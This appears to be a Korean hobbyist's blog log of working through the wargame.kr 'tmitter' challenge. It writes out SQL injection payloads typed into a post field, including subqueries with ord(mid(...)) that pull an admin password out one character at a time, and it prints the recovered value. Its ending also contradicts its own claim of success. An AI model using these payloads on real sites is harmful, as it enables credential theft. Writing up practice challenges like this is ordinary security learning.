[wargame.kr] tmitter solving... 2일차

tmitter_cocoa.txt

절대로 풀이가 아닙니다. 이것은

---

오늘 서브쿼리에 대한 공부를 조금 했는데, 이 tmitter문제는 서브쿼리에 대한 문제가 아닐까 싶다.

일단 tmitter.php 에 있는 내용을 출력하는 쿼리는 

select * from table_name order by idx desc;

이 것으로 보인다. 여기서는 취약점 공략할 곳이 없을 것 같다. 

입력하는 곳에서 보면 되지 않을까 싶다. 입력하는 쿼리를 추측해보면

insert into table_name (id, content) values ('admin', 'asdf');

이거일텐데.. 서브쿼리로 admin의 패스워드를 출력하면 될 것 같기도하다. 

우오오오ㅗ오오 현재 시각 11:41 새로운 걸 발견해버렸다

asdf', 'admin');#

이렇게 입력하니까 

쿼리가 성공적으로 들어갔다. 

역시 내 예상대로 게시판의 쿼리는 

insert into (table_name)(content, id) values ('$content', $id); 

인 것같다. 

으아 풀면서 대충 알아낸건데 "admin is me~~~" 는 글자가 많으면 나오는 것 같다. 

'+(select ps from tmitter_user where id='admin'), 'admin')# 

이렇게 입력하니까 0이 반환되었다. 대충 실마리를 잡았다. 

'/(select ps from tmitter_user where id='admin'), 'admin')# 

이렇게 입력하니까 공란으로 트윗하는 걸 막는 걸 우회할 수 있었다. 예상밖의 수확

+ 새벽 1시 8분... 

'+(select ord(mid((select ps from tmitter_user where id='admin'), 1, 1))), 'admin')#

이렇게 입력하니까 105출력됨..ㅋㅋㅋㅋㅋ 이제 거의 다 푼듯하다ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

+ 새벽 1시 13분

'+(select length(select ps from tmitter_user where id='admin')), 'admin')#

이 쿼리를 입력하니까.. 21.. 다른 방법을 모색해야겠다.

+ 새벽 1시 34분 

으아아ㅏㅏ 진짜 어떻게하는거지..ㄷㄷ 내일 학교가야하는데

+ 새벽 1시 37분

그냥 아까 발견한 방법대로 차례차레 출력해야겠다...ㅜ 귀찮은데

+ 새벽 1시 45분..

106, 68, 48, 110, 84, 107, 110, 48, 119, 112, 97, 115, 115, 119, 48, 114, 100, 46, 46, 33, 33 

후하후하 힘들다 이제 변환만 하면 된다.

select concat(char(106), char(68), char(48), char(110), char(84), char(107), char(110), char(48), char(119), char(112), char(97), char(115), char(115), char(119), char(48), char(114), char(100), char(46), char(46), char(33), char(33));

쿼리를 완성했는데.. "jD0nTkn0wpassw0rd..!!"이렇게 떠서.. 확인해보니까 login failed... 아오..

으아ㅏㅏ 설마 다시해야하는 건 아니겠지 설마

보니까 맨 처음 아스키가 105였는데 106 으로 입력해버렸닼ㅋㅋㅋㅋㅋㅋㅋㅋㅋ

이제 인증됨ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

어떻게 풀어야할지 진짜 감이 안잡힌다. 오늘은 그냥 자야겠다.